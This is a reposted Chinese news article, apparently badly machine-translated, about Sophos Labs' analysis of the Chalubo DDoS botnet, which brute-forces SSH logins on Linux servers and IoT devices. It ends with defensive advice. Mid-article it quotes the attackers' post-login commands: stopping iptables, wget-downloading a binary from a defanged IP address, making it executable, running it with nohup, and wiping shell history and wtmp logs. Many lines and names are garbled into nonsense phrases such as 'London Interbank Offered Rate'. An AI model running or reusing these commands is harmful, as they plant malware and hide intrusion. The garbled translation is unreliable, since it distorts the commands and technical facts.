最新的ｃｈａｌｕｂｏ僵尸网络攻击，目标是服务器和物联网设备

网络安全公司Sophos的一部分Sophos实验室在周一( 10月22日)发表的博客文章中指出，他们一直在关注9月初开始的网络攻击，目标是打开SSH服务器的Linux服务器。在这次攻击中，攻击者的主要目的是传播一种新的自动化DDoS攻击工具，他们称之为“cha lubo”。

sophos实验室分析显示，攻击者使用Chacha流密码来加密Cha Lubo的主要组件和相应的Lua脚本，而在最新版本中，攻击者采用了更常见的Windows恶意软件原则来防止Cha Lubo检测。保持不变的是，cha lubo的最新版本也包含了xor的代码。DDoS和米拉伊恶意软件家族。

它在八月底开始传播，现在有几个版本

据Sophos Labs称，Cha Lubo在8月下旬开始通过网络感染目标设备，攻击者将通过在被感染的设备上发布命令来检索它。cha Lubo实际上由三部分组成:下载模块、主bot程序(最初只能在x86处理器架构的系统上运行)和Lua命令脚本。

到10月中旬，攻击者开始发布命令来检索elk not dropper (检测为Linux / DDoS - az )，该命令用于提供cha - lub ( cha - Lua - bot )包的其余部分。

此外，有各种版本的BOT程序可以在不同的处理器架构上运行，包括32位和64位ARM、x86、x86 _ 64、MIPS、MIPEL和PowerPC。这可能表明这一网络攻击活动的测试阶段已经结束，也许我们会看到基于cha lubo的攻击数量持续增加。

尝试暴力破解密码并强制登录SSH服务器

sophos实验室称，他们部署的蜜罐系统最初记录了2018年9月6日的攻击。cha Lubo的bot程序将首先尝试暴力破解密码登录ssh服务器。

攻击者一旦获得对目标设备的访问权限，就会发出以下命令:

/ etc / initialization / iptables stop

Service Network Table Stopped

suspend

resuspension 2 stops

Chatt - I / USR / Bucket / Bucket / Bucket

chmod 755 / usr / barrel / barrel / barrel

Yum! Inc

wget - c hxxp : / / 117。21。191。108 : 8694 / libsdes - P / usr / bin /

CHMOD 777 / USR / BIN / London Interbank Offered Rate

nohup / usr / bin / libsdes & amp；燃气轮机；/ dev /空2 & amp；燃气轮机；& amp；安培；1安培；安培；

Export history file = / dev / null

Risk Management - Finance / Risk Value / Log / WTMP

History

虽然攻击很常见，但是攻击者使用分层方法下载恶意组件，加密方法对于Linux恶意软件来说并不常见。

事实上，如果我们仔细观察造成持久攻击的代码段，我们会发现cha lubo从xor中复制了del服务和add服务函数。恶意软件家族。此外，一些代码段被复制到Mirai恶意软件，例如一些随机函数和util _ local _ addr函数的扩展代码。

Sophos实验室提出的一些预防建议和措施

由于cha lubo感染目标系统的主要方法是使用通用用户名和密码组合来猛烈破解ssh服务器的登录凭据，sohos实验室建议ssh服务器系统管理员(包括嵌入式设备)应该更改这些设备上的默认密码。如果可能，系统管理员最好使用SSH密钥而不是登录密码。

此外，像任何其他设备一样，保持系统的最新，及时安装官方修复程序，安装实用的反病毒软件将是良好的主动防御措施。

这篇文章由黑客视野的综合网络组织，图片来源于网络。请指出“来自黑客视觉”，并附上链接。